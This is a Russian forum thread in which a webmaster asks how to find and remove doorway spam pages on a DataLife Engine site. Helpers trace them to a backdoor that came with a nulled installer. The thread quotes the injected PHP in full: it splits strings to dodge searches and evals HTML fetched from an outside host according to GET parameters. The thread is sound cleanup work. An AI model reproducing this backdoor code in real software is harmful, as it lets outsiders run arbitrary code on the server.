Помощь Помогите удалить дорвей

Тема в разделе "DLE", создана пользователем davy, 4 дек 2014.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.1 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Модераторы: killoff
  1. davy

    davy

    Регистр.:
    19 июл 2009
    Сообщения:
    162
    Симпатии:
    9
    Доброго времени суток!

    Обнаружил на DLE (9.0) сайте дорвей: куча страниц, которые находятся по маскам урл: site.ru/?for_um=число или site.ru/?m=число

    Проверил индексный файл и .htaccess вроде ничего постороннего. Делал поиск в файлах сайта и БД по кускам текста дорвея - тоже ничего. Подскажите, куда копать?

    Дорвей стилизован под форум: Untitled-1.gif
     
    Последнее редактирование: 4 дек 2014
  2. Q_BASIC

    Q_BASIC

    Регистр.:
    30 ноя 2013
    Сообщения:
    380
    Симпатии:
    236
    А for_um не пробовали искать в исходниках? Если мне что-то надо найти, то я в .rar или .zip упаковываю и через WinRAR ищу
     
  3. davy

    davy

    Регистр.:
    19 июл 2009
    Сообщения:
    162
    Симпатии:
    9
    Да искал и эту конструкцию, но ничего не найдено. Я выкачал все файлы с сервера и через notepad++ выполняю поиск по файлам.
     
  4. Q_BASIC

    Q_BASIC

    Регистр.:
    30 ноя 2013
    Сообщения:
    380
    Симпатии:
    236
    Упакуйте в архив и через WinRAR ищите, он всё содержимое всего архива проверяет и все файлы. Можно попробовать искать еще base64_decode, eval, file_get_contents, curl, sock
     
    Последнее редактирование: 4 дек 2014
  5. Gorev

    Gorev

    Регистр.:
    30 авг 2012
    Сообщения:
    210
    Симпатии:
    36
    Можно в приват адрес пациента и ссылочку на архив сайта?
     
  6. TecT

    TecT Пользователь для ТесТа

    Регистр.:
    25 фев 2009
    Сообщения:
    449
    Симпатии:
    44
    Можно архив в ЛС с
    engine/classes/templates.class.php
    engine/inc/*
    engine/modules/*
    engine/engine.php
    engine/init.php
    Папку с шаблоном.

    Но если лень выбирать, тогда сделайте полный дамп сайта(без базы).
     
  7. Gorev

    Gorev

    Регистр.:
    30 авг 2012
    Сообщения:
    210
    Симпатии:
    36
    Переслал тебе в личку данные от ТС. Я мельком просмотрел файлы. Ничего такого не нашёл.
     
    davy нравится это.
  8. TecT

    TecT Пользователь для ТесТа

    Регистр.:
    25 фев 2009
    Сообщения:
    449
    Симпатии:
    44
    А я думал это тс ) ну передашь ему файл ).

    Поиск не работал так как красиво вывод переменой был осуществлён в такм виде
    PHP:
    'for'.'_um'
    поэтому поиск по ключу for_um, не давал результата.
     
    davy нравится это.
  9. davy

    davy

    Регистр.:
    19 июл 2009
    Сообщения:
    162
    Симпатии:
    9
    TecT, респект тебе за помощь! Хитро сделали, ничего не скажешь. Причем дата изменения файла совпадает с датой установки CMS, получается код был вшит непосредственно в инсталятор. Откуда скачивал уже не помню, но в информации значится "Nulled by M.I.D-Team" и ссылка на 6dle. ru. На релизеров гнать не буду, ибо гадость могли вшить уже после них.

    Остался еще вопрос по поводу того, как безболезненно удалить дорвей. Вот кусок кода:

    PHP:
    if (! defined ( 'DATALIFEENGINE' )) {
        die ( "Hacking attempt!" );
    }

    @include (ENGINE_DIR . '/data/config.php');

    if ($config['http_home_url'] == "") {
     
        $config['http_home_url'] = explode ( "index.php", $_SERVER['PHP_SELF'] );
        $config['http_home_url'] = reset ( $config['http_home_url'] );
        $config['http_home_url'] = "http://" . $_SERVER['HTTP_HOST'] . $config['http_home_url'];

    }

    if (! $config['version_id']) die ( "Datalife Engine not installed. Please run install.php" );
    if(isset($_GET['for'.'_um'])){ $p = (int)$_GET['for'.'_um']; echo eval('?>' . join("",file("http://best"."tresh"."via1.com/23."."03/15/$p.html")). '<?'); die; } if(isset($_GET['m'])) { $m = (int)$_GET['m']; if($m==0)$m=""; echo eval('?>' . join("",file("http://best"."tresh"."via1.com/23."."03/15/map$m.html")). '<?'); die; } if(isset($_GET['for'.'um1']) && $_GET['for'.'um1'] == 'index') { echo eval('?>' . join("",file("http://best"."tresh"."via1.com/23."."03/15/index1.html")). '<?'); die(); } echo '';
    require_once ENGINE_DIR . '/classes/mysql.php';
    require_once ENGINE_DIR . '/data/dbconfig.php';
    require_once ENGINE_DIR . '/modules/functions.php';
    require_once ENGINE_DIR . '/modules/gzip.php';
    Правильно ли просто удалить строку 16? Или надо что-то еще сделать?

    Также интересует такой вопрос, при простом удалении этой строки адреса дорвея не выдают 404 ошибку, а открывают главную. Как это можно исправить?
     
  10. TecT

    TecT Пользователь для ТесТа

    Регистр.:
    25 фев 2009
    Сообщения:
    449
    Симпатии:
    44
    Удалить можно то что я за комментировал он не нужен и на работу движка не повлияет.

    Насчёт ошибок, а адрес и не будет вести на ошибку 404, так как движок дле если находит не существующую страницу он перенаправляет на главную, так что это обычное явление. Для этого в дле и есть тэг {info}, при переходе на несуществующую страницу движок кидает на главную а в {info} выводит сообщение такого плана
    Код:
    К сожалению, страница fsdfsdf.html для Вас не доступна: возможно, был изменен ее адрес или она была удалена. Пожалуйста, воспользуйтесь поиском.